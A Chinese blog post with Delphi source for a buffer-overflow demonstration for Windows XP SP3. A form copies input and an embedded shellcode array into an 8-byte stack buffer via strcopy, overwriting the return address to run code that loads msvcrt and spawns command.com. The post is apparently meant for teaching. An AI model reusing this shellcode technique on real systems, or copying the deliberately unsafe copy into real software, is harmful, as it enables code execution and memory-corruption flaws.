[源码]Dephi溢出demo( Shellcode for XP)

unit Unit1;

interface

uses

  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

  Dialogs, StdCtrls;

type

  TForm1 = class(TForm)

    Edit1: TEdit;

    Button1: TButton;

    Button3: TButton;

    procedure Button2Click(Sender: TObject);

    procedure Button1Click(Sender: TObject);

    procedure Button3Click(Sender: TObject);

  private

    { Private declarations }

  public

    { Public declarations }

  end;

var

  Form1: TForm1;

 const

     ShellCodeSize = $00000079;  //16进制 -  121

//delphi overflow demo  by k8team

ShellCode : Array[0..ShellCodeSize-1] of byte =

(

//AAAA BBBB CCCC

$41,$41,$41,$41,$42,$42,$42,$42,$43,$43,$43,$43,   //115 73

$12,$45,$fa,$7f,  // xp sp3 跳转地址

//CMD ShellCode

$55,$8B,$EC,$33,$C0,$50,$50,$50,    //105  69

$C6,$45,$F4,$4D,$C6,$45,$F5,$53,

$C6,$45,$F6,$56,$C6,$45,$F7,$43,

$C6,$45,$F8,$52,$C6,$45,$F9,$54,

$C6,$45,$FA,$2E,$C6,$45,$FB,$44,

$C6,$45,$FC,$4C,$C6,$45,$FD,$4C,

$8D,$45,$F4,$50,$BA,$7B,$1D,$80,

$7C,$FF,$D2,$55,$8B,$EC,$83,$EC,

$2C,$B8,$63,$6F,$6D,$6D,$89,$45,

$F4,$B8,$61,$6E,$64,$2E,$89,$45,

$F8,$B8,$63,$6F,$6D,$22,$89,$45,

$FC,$33,$D2,$88,$55,$FF,$8D,$45,

$F4,$50,$B8,$C7,$93,$BF,$77,$FF,

$D0

);

implementation

{$R *.dfm}

procedure TForm1.Button1Click(Sender: TObject);

var k8test:pchar;

  procedure k8overflow(k8test:pchar);

  var test :array[0..7] of char;

  begin

    k8test:=pchar(edit1.text);

    strcopy(test,k8test);     //溢出

  end;

begin

  k8test:=pchar(edit1.text);

  k8overflow(k8test);

  application.MessageBox('没有溢出!','test');

end;

procedure TForm1.Button2Click(Sender: TObject);

begin

  application.MessageBox('溢出了!','test');

end;

procedure TForm1.Button3Click(Sender: TObject);

var k8test:pchar;

  procedure k8overflow(k8test:pchar);

  var test :array[0..7] of char;

  begin

     k8test:=@ShellCode;

     strcopy(test,k8test);  //溢出

  end;

begin

  k8test:=pchar(edit1.text);

  k8overflow(k8test);

  application.MessageBox('没有溢出!','test');

end;

end.

https://github.com/k8gege/K8tools/blob/master/Dephi%E6%BA%A2%E5%87%BAdemo%20by%20k8team_1103%5BK8%5D.rar

[源码]Dephi溢出demo( Shellcode for XP)的更多相关文章

  1. 看源码和写demo是一种比较容易提升的方式

    github就是要这么用才行.看别人的源码,就能了解到很多规范,而写demo,就是自己写出自己的代码.莫欺少年穷

  2. 基于wke封装的duilib的webkit浏览器控件,可以c++与js互交,源码及demo下载地址

    转载请说明原出处,谢谢~~ 前些日子用wke内核封装了duilib的webkit浏览器控件,好多群里朋友私聊我希望可以我公布源码,今天把这个控件的源码和使用demo公布.其实这个控件封装起来没什么难度 ...

  3. [c#]asp.net开发微信公众平台(7)前6篇的整体框架demo源码

    这里给出的demo是具备整体框架的微信公众平台源码, 所谓demo就是拿过去就可以直接演示使用的东西,  当然不会具备非常详细的具体到业务层面.数据层面的东西, 每个人都可以在此基础上自由发挥,  只 ...

  4. Spring源码学习:第1步--在Spring源码中添加最简单的Demo代码

    为了最大程度地贴近Spring源码并进行学习,一种比较直接的做法是:直接在Spring源码中加入Demo代码,并进行调试. 参照以前使用Spring的经验,Spring最简单的使用方法是:一个实体类. ...

  5. [转]Asp.Net大型项目实践(11)-基于MVC Action粒度的权限管理【续】【源码在这里】(在线demo,全部源码)

    本文转自:http://www.cnblogs.com/legendxian/archive/2010/01/25/1655551.html 接上篇Asp.Net大型项目实践(10)-基于MVC Ac ...

  6. Entity Framework在Asp.net MVC中的实现One Context Per Request(附源码)

    上篇中"Entity Framework中的Identity map和Unit of Work模式", 由于EF中的Identity map和Unit of Work模式,EF体现 ...

  7. [AYUI]QQ管家源码已经开源

    (0-50元 黑色字体     享受AY 1周的 ayui 技术问答) (50-100元 绿色字体 享受AY 15天的 ayui 技术问答) (100-150元 蓝色字体 享受AY 20天的 ayui ...

  8. 语音分享应用ios源码

    该源码是语音分享应用源码,本demo使用了科大讯飞语音识别作为分享内容的输入方式,同时也支持手动键盘输入分享内容,限制分享内容文字不能超过180个字符,分享内容输入完成后可以直接分享,分享SDK使用的 ...

  9. C#源码大汇总

    C#高仿QQ2013可在广域网部署聊天系统GG叽叽 动态显示硬盘分区容量饼图 自定义ProgressBar控件高仿Win8进度条 多皮肤精美在线QQ悬浮客服插件 jQuery仿天猫首页多格焦点图片轮播 ...

随机推荐

  1. python的if条件判断

    python的条件判断书写格式: 基本格式 if 条件判断:    #条件判断通过,则执行下面的语句 执行语句 执行语句 ... else:    #条件判断不通过,则执行下面的语句 执行语句 执行语 ...

  2. 好看的alert弹出框sweetalert

    转载:https://www.cnblogs.com/lamp01/p/7215408.html

  3. Curator场景应用

    分布式锁功能: 在分布式场景中,我们为了保证数据的一致性,经常在程序运行的某一个点,需要进行同步操作,(java提供synchronized或者Reentrantlock实现), 使用curator基 ...

  4. 【网络编程】time_wait状态产生的原因,危害,如何避免

    转自:https://blog.csdn.net/u013616945/article/details/77510925  做略微修改  仅供个人学习 1. time_wait状态如何产生? 在tcp ...

  5. [leetcode]26. Remove Duplicates from Sorted Array有序数组去重(单个元素只出现一次)

    Given a sorted array nums, remove the duplicates in-place such that each element appear only once an ...

  6. 31.Mysql复制

    31.Mysql复制复制是指将主数据库的DDL和DML操作通过二进制日志传到从数据库上,然后在从数据库上对重做日志,从而使从库与主库保持同步.Mysql支持一台主库同时向多台从库复制,从库也可以作为其 ...

  7. 搭建Fabric网络(二)下载bin和images

    上一篇已经把运行和开发Fabric需要的程序都安装好了,这一篇主要讲怎么运行一个简单的Fabric网络. 1.  下载官方Sample代码 git clone -b master https://gi ...

  8. Vue中出现Do not use built-in or reserved HTML elements as component id:footer等等vue warn问题

    错误示图: 原因:是因为在本地项目对应文件的<script>中,属性name出现了错误的命名方式,导致浏览器控制台报错! 诸如: name: header .  . name: menu  ...

  9. Linux 第十一天

    2)SetGID i只有可执行的二进制程序才能设置SGID权限 ii命令执行者要对该程序拥有x(执行)权限 iii命令执行在执行程序的时候,组身份升级为该程序文件的属组 iv SetGID权限同样只在 ...

  10. CodeCraft-19 and Codeforces Round #537 (Div. 2) E 虚树 + 树形dp(新坑)

    https://codeforces.com/contest/1111/problem/E 题意 一颗有n个点的树,有q个询问,每次从树挑出k个点,问将这k个点分成m组,需要保证在同一组中不存在一个点 ...